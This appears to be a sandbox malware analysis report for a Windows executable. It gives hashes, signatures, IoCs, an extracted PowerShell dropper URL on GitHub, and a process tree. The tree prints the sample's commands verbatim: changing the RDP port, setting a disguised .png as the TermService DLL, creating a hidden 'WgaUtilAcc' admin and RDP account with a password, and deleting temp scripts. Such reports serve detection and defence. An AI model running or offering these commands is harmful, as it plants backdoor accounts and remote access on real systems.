65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e

Analysis

max time kernel
74s
max time network
76s
platform
windows10_x64
resource
win10v20210408
submitted
01-10-2021 08:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c1e0df4f2321e9375baee3a0a26fba64.exe
Size

5.7MB
MD5

c1e0df4f2321e9375baee3a0a26fba64
SHA1

dcf4d90d2f3fd11f14b5413be5b7dde70ff33f7c
SHA256

65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e
SHA512

4bc74603d8a7a28a0c965cb78d7762c01312cdb6ee7d8be8f822ebb6bf3dbd273ac76c3ad5d0c70f9fa9439981c19a9bed4525f445d7faddb93e9db5a66a0ad7

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	Process
2	3848	powershell.exe
4	3848	powershell.exe
5	3848	powershell.exe
6	3848	powershell.exe
8	3848	powershell.exe
10	3848	powershell.exe
12	3848	powershell.exe
14	3848	powershell.exe
16	3848	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000600000001ab44-348.dat	upx
behavioral2/files/0x000600000001ab45-349.dat	upx

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1684
1684

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC668.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC6C6.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC6E7.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC6F8.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC6F7.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_t5eosdcn.z0n.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dzl2yys3.5sw.psm1	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2764	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1424	powershell.exe
1424	powershell.exe
1424	powershell.exe
4008	powershell.exe
4008	powershell.exe
4008	powershell.exe
564	powershell.exe
564	powershell.exe
564	powershell.exe
3972	powershell.exe
3972	powershell.exe
3972	powershell.exe
1424	powershell.exe
1424	powershell.exe
1424	powershell.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
612
612

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeIncreaseQuotaPrivilege	4008	powershell.exe
Token: SeSecurityPrivilege	4008	powershell.exe
Token: SeTakeOwnershipPrivilege	4008	powershell.exe
Token: SeLoadDriverPrivilege	4008	powershell.exe
Token: SeSystemProfilePrivilege	4008	powershell.exe
Token: SeSystemtimePrivilege	4008	powershell.exe
Token: SeProfSingleProcessPrivilege	4008	powershell.exe
Token: SeIncBasePriorityPrivilege	4008	powershell.exe
Token: SeCreatePagefilePrivilege	4008	powershell.exe
Token: SeBackupPrivilege	4008	powershell.exe
Token: SeRestorePrivilege	4008	powershell.exe
Token: SeShutdownPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeSystemEnvironmentPrivilege	4008	powershell.exe
Token: SeRemoteShutdownPrivilege	4008	powershell.exe
Token: SeUndockPrivilege	4008	powershell.exe
Token: SeManageVolumePrivilege	4008	powershell.exe
Token: 33	4008	powershell.exe
Token: 34	4008	powershell.exe
Token: 35	4008	powershell.exe
Token: 36	4008	powershell.exe
Token: SeDebugPrivilege	564	powershell.exe
Token: SeIncreaseQuotaPrivilege	564	powershell.exe
Token: SeSecurityPrivilege	564	powershell.exe
Token: SeTakeOwnershipPrivilege	564	powershell.exe
Token: SeLoadDriverPrivilege	564	powershell.exe
Token: SeSystemProfilePrivilege	564	powershell.exe
Token: SeSystemtimePrivilege	564	powershell.exe
Token: SeProfSingleProcessPrivilege	564	powershell.exe
Token: SeIncBasePriorityPrivilege	564	powershell.exe
Token: SeCreatePagefilePrivilege	564	powershell.exe
Token: SeBackupPrivilege	564	powershell.exe
Token: SeRestorePrivilege	564	powershell.exe
Token: SeShutdownPrivilege	564	powershell.exe
Token: SeDebugPrivilege	564	powershell.exe
Token: SeSystemEnvironmentPrivilege	564	powershell.exe
Token: SeRemoteShutdownPrivilege	564	powershell.exe
Token: SeUndockPrivilege	564	powershell.exe
Token: SeManageVolumePrivilege	564	powershell.exe
Token: 33	564	powershell.exe
Token: 34	564	powershell.exe
Token: 35	564	powershell.exe
Token: 36	564	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeIncreaseQuotaPrivilege	3972	powershell.exe
Token: SeSecurityPrivilege	3972	powershell.exe
Token: SeTakeOwnershipPrivilege	3972	powershell.exe
Token: SeLoadDriverPrivilege	3972	powershell.exe
Token: SeSystemProfilePrivilege	3972	powershell.exe
Token: SeSystemtimePrivilege	3972	powershell.exe
Token: SeProfSingleProcessPrivilege	3972	powershell.exe
Token: SeIncBasePriorityPrivilege	3972	powershell.exe
Token: SeCreatePagefilePrivilege	3972	powershell.exe
Token: SeBackupPrivilege	3972	powershell.exe
Token: SeRestorePrivilege	3972	powershell.exe
Token: SeShutdownPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeSystemEnvironmentPrivilege	3972	powershell.exe
Token: SeRemoteShutdownPrivilege	3972	powershell.exe
Token: SeUndockPrivilege	3972	powershell.exe
Token: SeManageVolumePrivilege	3972	powershell.exe
Token: 33	3972	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c1e0df4f2321e9375baee3a0a26fba64.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 364 wrote to memory of 1424	364	c1e0df4f2321e9375baee3a0a26fba64.exe	68
PID 364 wrote to memory of 1424	364	c1e0df4f2321e9375baee3a0a26fba64.exe	68
PID 1424 wrote to memory of 2468	1424	powershell.exe	70
PID 1424 wrote to memory of 2468	1424	powershell.exe	70
PID 2468 wrote to memory of 2676	2468	csc.exe	71
PID 2468 wrote to memory of 2676	2468	csc.exe	71
PID 1424 wrote to memory of 4008	1424	powershell.exe	72
PID 1424 wrote to memory of 4008	1424	powershell.exe	72
PID 1424 wrote to memory of 564	1424	powershell.exe	75
PID 1424 wrote to memory of 564	1424	powershell.exe	75
PID 1424 wrote to memory of 3972	1424	powershell.exe	77
PID 1424 wrote to memory of 3972	1424	powershell.exe	77
PID 1424 wrote to memory of 2412	1424	powershell.exe	79
PID 1424 wrote to memory of 2412	1424	powershell.exe	79
PID 1424 wrote to memory of 2764	1424	powershell.exe	80
PID 1424 wrote to memory of 2764	1424	powershell.exe	80
PID 1424 wrote to memory of 2676	1424	powershell.exe	81
PID 1424 wrote to memory of 2676	1424	powershell.exe	81
PID 1424 wrote to memory of 3980	1424	powershell.exe	82
PID 1424 wrote to memory of 3980	1424	powershell.exe	82
PID 3980 wrote to memory of 3884	3980	net.exe	83
PID 3980 wrote to memory of 3884	3980	net.exe	83
PID 1424 wrote to memory of 4088	1424	powershell.exe	84
PID 1424 wrote to memory of 4088	1424	powershell.exe	84
PID 4088 wrote to memory of 3676	4088	cmd.exe	85
PID 4088 wrote to memory of 3676	4088	cmd.exe	85
PID 3676 wrote to memory of 3756	3676	cmd.exe	86
PID 3676 wrote to memory of 3756	3676	cmd.exe	86
PID 3756 wrote to memory of 3952	3756	net.exe	87
PID 3756 wrote to memory of 3952	3756	net.exe	87
PID 1424 wrote to memory of 4012	1424	powershell.exe	88
PID 1424 wrote to memory of 4012	1424	powershell.exe	88
PID 4012 wrote to memory of 3984	4012	cmd.exe	89
PID 4012 wrote to memory of 3984	4012	cmd.exe	89
PID 3984 wrote to memory of 2872	3984	cmd.exe	90
PID 3984 wrote to memory of 2872	3984	cmd.exe	90
PID 2872 wrote to memory of 4076	2872	net.exe	91
PID 2872 wrote to memory of 4076	2872	net.exe	91
PID 2688 wrote to memory of 808	2688	cmd.exe	95
PID 2688 wrote to memory of 808	2688	cmd.exe	95
PID 808 wrote to memory of 564	808	net.exe	96
PID 808 wrote to memory of 564	808	net.exe	96
PID 508 wrote to memory of 2340	508	cmd.exe	99
PID 508 wrote to memory of 2340	508	cmd.exe	99
PID 2340 wrote to memory of 2792	2340	net.exe	100
PID 2340 wrote to memory of 2792	2340	net.exe	100
PID 2512 wrote to memory of 3516	2512	cmd.exe	103
PID 2512 wrote to memory of 3516	2512	cmd.exe	103
PID 3516 wrote to memory of 3840	3516	net.exe	104
PID 3516 wrote to memory of 3840	3516	net.exe	104
PID 1792 wrote to memory of 3960	1792	cmd.exe	107
PID 1792 wrote to memory of 3960	1792	cmd.exe	107
PID 3960 wrote to memory of 4004	3960	net.exe	108
PID 3960 wrote to memory of 4004	3960	net.exe	108
PID 2796 wrote to memory of 3980	2796	cmd.exe	111
PID 2796 wrote to memory of 3980	2796	cmd.exe	111
PID 3980 wrote to memory of 2884	3980	net.exe	112
PID 3980 wrote to memory of 2884	3980	net.exe	112
PID 3828 wrote to memory of 3768	3828	cmd.exe	115
PID 3828 wrote to memory of 3768	3828	cmd.exe	115
PID 3768 wrote to memory of 4028	3768	net.exe	116
PID 3768 wrote to memory of 4028	3768	net.exe	116
PID 4008 wrote to memory of 736	4008	cmd.exe	119
PID 4008 wrote to memory of 736	4008	cmd.exe	119

C:\Users\Admin\AppData\Local\Temp\c1e0df4f2321e9375baee3a0a26fba64.exe
"C:\Users\Admin\AppData\Local\Temp\c1e0df4f2321e9375baee3a0a26fba64.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\keemdhfy\keemdhfy.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2468
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES676F.tmp" "c:\Users\Admin\AppData\Local\Temp\keemdhfy\CSCBC17C2276B694E33B56DC9BD8A65BFB8.TMP"
      4⤵
      PID:2676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2412
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:2764
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2676
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3884
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3676
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3756
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3984
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2872
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4076
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1648
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3188

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:564

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc vxsBvxdC /add
1⤵
- Suspicious use of WriteProcessMemory
PID:508
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc vxsBvxdC /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc vxsBvxdC /add
    3⤵
    PID:2792

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:3840

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    3⤵
    PID:4004

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2796
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2884

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc vxsBvxdC
1⤵
